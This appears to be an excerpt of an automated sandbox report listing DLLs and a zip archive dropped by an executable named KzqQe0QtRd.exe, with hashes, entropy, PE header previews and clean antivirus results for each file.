                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):10752
                                                                                                                                                                                          Entropy (8bit):4.494356436323832
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:mMWpVVdJvbrqTuy/Th/Y0IluLfcC75JiC4cs89EfqADShDsAbcX6gn/7EC:mMsVddiTHThQTctdErDqDsicqgn/7
                                                                                                                                                                                          MD5:16E75FC29DB0FA934EC1FA93838B89AE
                                                                                                                                                                                          SHA1:0EC593B6EDA40F0654BB5032BF7F7806C5E8914C
                                                                                                                                                                                          SHA-256:FA59EC8582807D76EE6627C26C0B57CC4CD88E3DCC307BE1C1ED56F0C63E7820
                                                                                                                                                                                          SHA-512:DC1CB42F3A094AC84805408A2906407D7B387788200DAB5DBBE4FDC09F02B11F687ECF2D8BC18759390775E532F73250653D8CBB9BF91C997B7C0C09FCEF32F8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6!..WO.WO.WO./..WO..+N.WO../N.WO.WN.WO..+J.WO..+K.WO..+L.WO.R+G.WO.R+O.WO.R+..WO.R+M.WO.Rich.WO.................PE..d....Ded.........." ..."............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                          Entropy (8bit):4.7372077697895945
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:zWVddiTHThQTctEEaEDKDvMRWJcqgbW6:SMdsc+EaEDKDvCWvgbW
                                                                                                                                                                                          MD5:1831CB26FD8EE2B0AB0496F80272FC04
                                                                                                                                                                                          SHA1:BC8E78CC005859F7272C3615A3774BA7D687F0F4
                                                                                                                                                                                          SHA-256:D830D77669527129BF3D10929AAD1CC9EE5E44A9594E3FC651D3B5BC01C42C44
                                                                                                                                                                                          SHA-512:DF51D636A277C8AD83C90AE99A824F77C441DA5C7B08A11C3D8752CD3661096EBF327008951CA97B4BAF9632B2CA16DF34A9F3E43BF837C8556BCB3C304BB2CC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                          Entropy (8bit):4.693475725745118
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:zuZVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EMz3DVWMot4BcX6gbW6O:zUVddiTHThQTctEEO3DloKcqgbW6
                                                                                                                                                                                          MD5:3AF448B8A7EF86D459D86F88A983EAEC
                                                                                                                                                                                          SHA1:D852BE273FEA71D955EA6B6ED7E73FC192FB5491
                                                                                                                                                                                          SHA-256:BF3A209EDA07338762B8B58C74965E75F1F0C03D3F389B0103CC2BF13ACFE69A
                                                                                                                                                                                          SHA-512:BE8C0A9B1F14D73E1ADF50368293EFF04AD34BDA71DBF0B776FFD45B6BA58A2FA66089BB23728A5077AB630E68BF4D08AF2712C1D3FB7D79733EB06F2D0F6DBF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):109440
                                                                                                                                                                                          Entropy (8bit):6.642252418996898
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                                                                                                                                                                          MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                                                                                                                                                                          SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                                                                                                                                                                          SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                                                                                                                                                                          SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65304
                                                                                                                                                                                          Entropy (8bit):6.187244032149753
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:92icaMc9076gzE6+gTKnEzRIsOnev7SyP4xw:92icrclGE6+gTOEzRIsOn2V
                                                                                                                                                                                          MD5:511A52BCB0BD19EDA7AA980F96723C93
                                                                                                                                                                                          SHA1:B11AB01053B76EBB60AB31049F551E5229E68DDD
                                                                                                                                                                                          SHA-256:D1FB700F280E7793E9B0DCA33310EF9CD08E9E0EC4F7416854DFFAF6F658A394
                                                                                                                                                                                          SHA-512:D29750950DB2ECBD941012D7FBDD74A2BBD619F1A92616A212ACB144DA75880CE8A29EC3313ACBC419194219B17612B27A1833074BBBAA291CDB95B05F8486FF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.i..i..i......i.v.h..i.v.l..i.v.m..i.v.j..i...h..i...h..i..h.V.i...d..i...i..i.....i...k..i.Rich.i.........................PE..d....k.d.........." ...$.R..........`...............................................'.....`.............................................P...`...d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):84760
                                                                                                                                                                                          Entropy (8bit):6.571366239395909
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:+O1z7poK78xa5yp6aclDqGihM8Vh948L5IsCVQ7SyhxG:31z9h9plDshvVhH5IsCVQk
                                                                                                                                                                                          MD5:4438AFFAAA0CA1DF5B9B1CDAA0115EC1
                                                                                                                                                                                          SHA1:4EDA79EAF3DE614D5F744AA9EEA5BFCF66E2D386
                                                                                                                                                                                          SHA-256:EC91E2B4BACA31B992D016B84B70F110CE2B1B2DFD54F5E5BEF6270ED7D13B85
                                                                                                                                                                                          SHA-512:6992107AC4D2108E477BC81AF667B8B8E5439231E7E9F4B15CE4BCE1AEEA811BC0F1AAA438BE3B0E38597760CB504367512809EE1937C4B538A86724AE543BA6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B......B.i.C...B.i.....B.i.G...B.i.F...B.i.A...B..C...B..C...B...C..B..O...B..B...B......B..@...B.Rich..B.........................PE..d....k.d.........." ...$.....^...............................................P......2.....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):181760
                                                                                                                                                                                          Entropy (8bit):6.176962076839488
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                          MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                          SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                          SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                          SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):123672
                                                                                                                                                                                          Entropy (8bit):6.0603476725812415
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:T7u5LnIxdP3fPHW+gfLIhAxKpemWtIsLPKlY:Tw+3FgfLIhFemWeY
                                                                                                                                                                                          MD5:6114277C6FC040F68D25CA90E25924CD
                                                                                                                                                                                          SHA1:028179C77CB3BA29CD8494049421EAA4900CCD0E
                                                                                                                                                                                          SHA-256:F07FE92CE85F7786F96A4D59C6EE5C05FE1DB63A1889BA40A67E37069639B656
                                                                                                                                                                                          SHA-512:76E8EBEFB9BA4EA8DCAB8FCE50629946AF4F2B3F2F43163F75483CFB0A97968478C8AAEF1D6A37BE85BFC4C91A859DEDA6DA21D3E753DAEFE084A203D839353D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...M.".B......F......H......L......@...^..F......E......B......G...D.......^..B...^..E...^.N.E...^..E...RichD...........PE..d....k.d.........." ...$............p\..............................................[.....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):253720
                                                                                                                                                                                          Entropy (8bit):6.554150968006557
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:3V9E1CyOa72oP+pG1/dgD09qWM53pLW1ADDtLRO75e:jEgyOa72jw1/d4VVhLE5e
                                                                                                                                                                                          MD5:BE315973AFF9BDEB06629CD90E1A901F
                                                                                                                                                                                          SHA1:151F98D278E1F1308F2BE1788C9F3B950AB88242
                                                                                                                                                                                          SHA-256:0F9C6CC463611A9B2C692382FE1CDD7A52FEA4733FFAF645D433F716F8BBD725
                                                                                                                                                                                          SHA-512:8EA715438472E9C174DEE5ECE3C7D9752C31159E2D5796E5229B1DF19F87316579352FC3649373DB066DC537ADF4869198B70B7D4D1D39AC647DA2DD7CFC21E8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.`...`...`.......`..,....`..,....`..,....`..,....`.......`.......`...`...`.......`.......`.......`....r..`.......`..Rich.`..........................PE..d....k.d.........." ...$.x...<......|...............................................>.....`.........................................0T..P....T...................'......./......P.......T...........................p...@............................................text...-w.......x.................. ..`.rdata..|............|..............@..@.data....*...p...$...T..............@....pdata...'.......(...x..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65304
                                                                                                                                                                                          Entropy (8bit):6.256836184121913
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:nfKlLLgy209/MkZy6nR3JZlivy7OjZopRIsOI/7SyAxn4:fKBgy+IZlh7OjSpRIsOI/M4
                                                                                                                                                                                          MD5:1524882AF71247ADECF5815A4E55366A
                                                                                                                                                                                          SHA1:E25014C793C53503BDFF9AF046140EDDA329D01B
                                                                                                                                                                                          SHA-256:6F7742DFDD371C39048D775F37DF3BC2D8D4316C9008E62347B337D64EBED327
                                                                                                                                                                                          SHA-512:5B954BB7953F19AA6F7C65AD3F105B77D37077950FB1B50D9D8D337BDD4B95343BAC2F4C9FE17A02D1738D1F87EEEF73DBBF5CDDDCB470588CBC5A63845B188A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,'@.MI..MI..MI..5...MI.:3H..MI.:3L..MI.:3M..MI.:3J..MI..2H..MI..5H..MI.G0H..MI..MH..MI..2D..MI..2I..MI..2...MI..2K..MI.Rich.MI.........PE..d....l.d.........." ...$.T...~......@@...............................................7....`............................................P... ............................/......X...P}..T............................|..@............p..0............................text....S.......T.................. ..`.rdata...O...p...P...X..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):159000
                                                                                                                                                                                          Entropy (8bit):6.8491410545695715
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:2tZVL5rdV/REWWjAYyznf49mNo+RRApqc5IsZ1v8N:2tZV3pREMAYO+ElG
                                                                                                                                                                                          MD5:737119A80303EF4ECCAA998D500E7640
                                                                                                                                                                                          SHA1:328C67C6C4D297AC13DA725BF24467D8B5E982E3
                                                                                                                                                                                          SHA-256:7158C1290AC29169160B3EC94D9C8BCDE4012D67A555F325D44B418C54E2CC28
                                                                                                                                                                                          SHA-512:1C9920E0841A65B01A0B339C5F5254D1039EF9A16FE0C2484A7E2A9048727F2CC081817AA771B0C574FB8D1A5A49DC39798A3C5E5B5E64392E9C168E1827BE7C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..'..lt..lt..lt...t..lt..mu..lt..iu..lt..hu..lt..ou..lt..mu..ltM.mu..lt..mt`.lt..au<.lt..lu..lt..t..lt..nu..ltRich..lt................PE..d....l.d.........." ...$.b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text...za.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):34584
                                                                                                                                                                                          Entropy (8bit):6.410940768849398
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:hXI6RwgJ5xeDTdywGnJ8BIsWt6F5YiSyvWKAMxkE9:pIoJ5UDTdywGJ8BIsWt6L7SyuoxB
                                                                                                                                                                                          MD5:2CA9FE51BF2EE9F56F633110A08B45CD
                                                                                                                                                                                          SHA1:88BA6525C71890A50F07547A5E9EAD0754DD85B9
                                                                                                                                                                                          SHA-256:1D6F1E7E9F55918967A37CBD744886C2B7EE193C5FB8F948132BA40B17119A81
                                                                                                                                                                                          SHA-512:821551FA1A5AA21F76C4AE05F44DDD4C2DAA00329439C6DADC861931FA7BD8E464B4441DFE14383F2BB30C2FC2DFB94578927615B089A303AA39240E15E89DE5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.*.&.y.&.y.&.y.^.y.&.yFX.x.&.yFX.x.&.yFX.x.&.yFX.x.&.y.Y.x.&.y.&.y.&.y.^.x.&.y.Y.x.&.y.Y.x.&.y.Y}y.&.y.Y.x.&.yRich.&.y........PE..d....k.d.........." ...$.....<......0.....................................................`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):50968
                                                                                                                                                                                          Entropy (8bit):6.433137711787963
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:A1MCcP4W1vqJiR5RMJl5XikC6r2lIsXtw5YiSyvUYAMxkEb:A1MiJifvkCllIsXti7SysGxf
                                                                                                                                                                                          MD5:AC053EF737E4F13B02BFA81F9E46170B
                                                                                                                                                                                          SHA1:5D8EBEB30671B74D736731696FEDC78C89DA0E1F
                                                                                                                                                                                          SHA-256:CB68E10748E2EFD86F7495D647A2774CEA9F97AD5C6FE179F90DC1C467B9280F
                                                                                                                                                                                          SHA-512:6AC26F63981DC5E8DFB675880D6C43648E2BBE6711C75DCAC20EBE4D8591E88FBFAC3C60660AB28602352760B6F5E1CB587075072ABD3333522E3E2549BFA02E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{.wo(.wo(.wo(...(.wo(..n).wo(..j).wo(..k).wo(..l).wo(..n).wo(.wn(.wo(..n).wo(..k).wo(..b).wo(..o).wo(...(.wo(..m).wo(Rich.wo(........................PE..d....k.d.........." ...$.B...X............................................................`.........................................0...X................................/......,....f..T...........................Pe..@............`...............................text...^A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32536
                                                                                                                                                                                          Entropy (8bit):6.452372346765785
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:K+yFV6rXMmxU9tIsQUl5YiSyvYAMxkEl1C:K+wEXMWU9tIsQUr7SyexXC
                                                                                                                                                                                          MD5:8BBED19359892F8C95C802C6AD7598E9
                                                                                                                                                                                          SHA1:773FCA164965241F63170E7A1F3A8FA17F73EA18
                                                                                                                                                                                          SHA-256:4E5B7C653C1B3DC3FD7519E4F39CC8A2FB2746E0ECDC4E433FE6029F5F4D9065
                                                                                                                                                                                          SHA-512:22EA7667689A9F049FA34DDAE6B858E1AF3E646A379D2C5A4AEF3E74A4FF1A4109418B363C9BE960127F1C7E020AA393A47885BC45517C9E9AEBE71EC7CB61A0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7X.Y..Y..Y......Y.v.X..Y.v.\..Y.v.]..Y.v.Z..Y...X..Y...X..Y..X...Y...T..Y...Y..Y.....Y...[..Y.Rich.Y.........................PE..d....k.d.........." ...$.....8............................................................`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):79640
                                                                                                                                                                                          Entropy (8bit):6.290503224602847
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:zbflGOzI+Jmrc0r3uj+9/s+S+pzpDAiTFVf78tIsLwy7SyJx+:V/IMA3uj+9/sT+pztAYFVT8tIsLwyA
                                                                                                                                                                                          MD5:64A6C475F59E5C57B3F4DD935F429F09
                                                                                                                                                                                          SHA1:CA2E0719DC32F22163AE0E7B53B2CAADB0B9D023
                                                                                                                                                                                          SHA-256:D03FA645CDE89B4B01F4A2577139FBB7E1392CB91DC26213B3B76419110D8E49
                                                                                                                                                                                          SHA-512:CF9E03B7B34CC095FE05C465F9D794319AAA0428FE30AB4DDCE14BA78E835EDF228D11EC016FD31DFE9F09D84B6F73482FB8E0F574D1FD08943C1EC9E0584973
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.......e..N....e..N....e..N....e..N....e.......e...e..Re.......e.......e.......e....{..e.......e..Rich.e..................PE..d....l.d.........." ...$.l...........%.......................................P......e]....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...6k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):120088
                                                                                                                                                                                          Entropy (8bit):6.257365630046476
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:hZ1UnKJVckfKE0izBCL1F4TSlNdtAhfw5ySJQVMJFcV4qsSxRIsOQZm:hcnoVckfqjb5XJF1a4
                                                                                                                                                                                          MD5:A7DF575BF69570944B004DFE150E8CAF
                                                                                                                                                                                          SHA1:2FD19BE98A07347D59AFD78C167601479AAC94BB
                                                                                                                                                                                          SHA-256:B1223420E475348C0BFB90FAE33FC44CE35D988270294158EC366893DF221A4B
                                                                                                                                                                                          SHA-512:18C381A4DED8D33271CBF0BEA75AF1C86C6D34CC436F68FB9342951C071C10D84CF9F96A0509C53E5886D47FED5BCA113A7F7863F6873583DAA7BB6AF1AA9AFA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..O..O..O.....O.p.N..O.p...O.p.J..O.p.K..O.p.L..O...N..O...N..O..N..O...B..O...O..O.....O...M..O.Rich.O.................PE..d....l.d.........." ...$............`...............................................7&....`..........................................Z..P....Z.........................../..............T...............................@............................................text............................... ..`.rdata..l...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):176920
                                                                                                                                                                                          Entropy (8bit):5.954664688637172
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:LFIQQShnmJg0ADm8H4qIOuXo6XHFBN9d41Olh59YL48PMrN/WgAlNzn5IsC7/1a:GShmaJDm24q6o6XHR4BLrT
                                                                                                                                                                                          MD5:A0B40F1F8FC6656C5637EACACF7021F6
                                                                                                                                                                                          SHA1:38813E25FFDE1EEE0B8154FA34AF635186A243C1
                                                                                                                                                                                          SHA-256:79D861F0670828DEE06C2E3523E2F9A2A90D6C6996BDE38201425AA4003119F1
                                                                                                                                                                                          SHA-512:C18855D7C0069FFF392D422E5B01FC518BBDF497EB3390C0B333ECAC2497CD29ABBDAE4557E4F0C4E90321FBA910FC3E4D235CE62B745FA34918F40FA667B713
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@.L.@.L.@.L.8$L.@.L.>.M.@.L.>.M.@.L.>.M.@.L.>.M.@.L.?.M.@.Lw=.M.@.L.@.L A.L.8.M.@.L.?.M.@.L.?.M.@.L.?HL.@.L.?.M.@.LRich.@.L........PE..d....l.d.........." ...$............l+....................................................`.........................................0...d................................/......|...P...T...............................@............................................text............................... ..`.rdata...".......$..................@..@.data...............................@....pdata...............\..............@..@.rsrc................h..............@..@.reloc..|............r..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1847837
                                                                                                                                                                                          Entropy (8bit):5.576134070292995
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:DQR5pATuFfR5lUKdcubgAnyPbawIBUiwhVENdYfXPWeSGTAbd2woPHH+:DQR5pnfROIRJRbQwP
                                                                                                                                                                                          MD5:AFA940580438A53079746369BDAB944D
